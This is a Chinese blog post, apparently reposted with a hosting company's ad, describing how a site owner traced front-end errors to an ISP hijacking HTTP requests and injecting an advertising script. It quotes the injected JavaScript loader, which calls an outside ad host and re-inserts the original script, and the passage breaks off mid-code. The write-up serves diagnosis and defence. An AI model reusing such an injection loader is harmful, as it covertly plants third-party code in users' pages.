這篇文章將為大家詳細(xì)講解有關(guān)如何發(fā)現(xiàn)ISP劫持HTTP請求,小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,希望大家閱讀完這篇文章后可以有所收獲。
目前創(chuàng)新互聯(lián)已為上千余家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)站空間、網(wǎng)站托管、服務(wù)器托管、企業(yè)網(wǎng)站設(shè)計(jì)、紅橋網(wǎng)站維護(hù)等服務(wù),公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。
編者按:Fundebug的客戶通過分析我們提供的報(bào)警信息,定位了一個(gè)非常棘手的問題—ISP劫持http請求。他的分析過程非常有意思,同時(shí)也提醒我們,應(yīng)該及時(shí)支持HTTPS來保證站點(diǎn)安全。
最近業(yè)務(wù)系統(tǒng)經(jīng)常受到前端報(bào)錯(cuò)郵件
發(fā)現(xiàn)大量的ip為沈陽聯(lián)通客戶==>初步推斷為運(yùn)營商http劫持
經(jīng)過現(xiàn)場排查發(fā)現(xiàn)出錯(cuò)畫面部分js加載出錯(cuò)
區(qū)別在于錯(cuò)誤的js會先插入一個(gè)廣告js
為區(qū)別是否DNS劫持查看NetWork面板
IP正確并且為我方服務(wù)器IP確認(rèn)并非為DNS***。
由于大面積出現(xiàn)沈陽聯(lián)通問題,(故而考慮應(yīng)當(dāng)為運(yùn)營商問題?應(yīng)該不會出現(xiàn)大范圍路由器被黑的可能吧)
返回js如下
(function () { try { var o = 'm-_-m', D = document; if (!D.getElementById(o)) { var j = 'http://yunxiu.f6car.com/kzf6/js/basic/XXX.js', J = j + (~j.indexOf('?') ? '&' : '?') + new Date().getTime(), M = 'http://pc.quansj.cn/?cid=08', C = D.currentScript, H = D.getElementsByTagName('head')[0], N = function (s, i) { var I = D.createElement('script'); I.type = 'text/JavaScript'; if (i) I.id = i; I.src = s; H.appendChild(I); }; if (self == top) { N(M, o); } if (!C) { C = (function () { var S = D.scripts, l = S.length, i = 0; for (; i < l; ++i) { if (S[i].src === j) { return S[i]; } } })(); } C && ((C.defer || C.async) ? N(J) : D.write('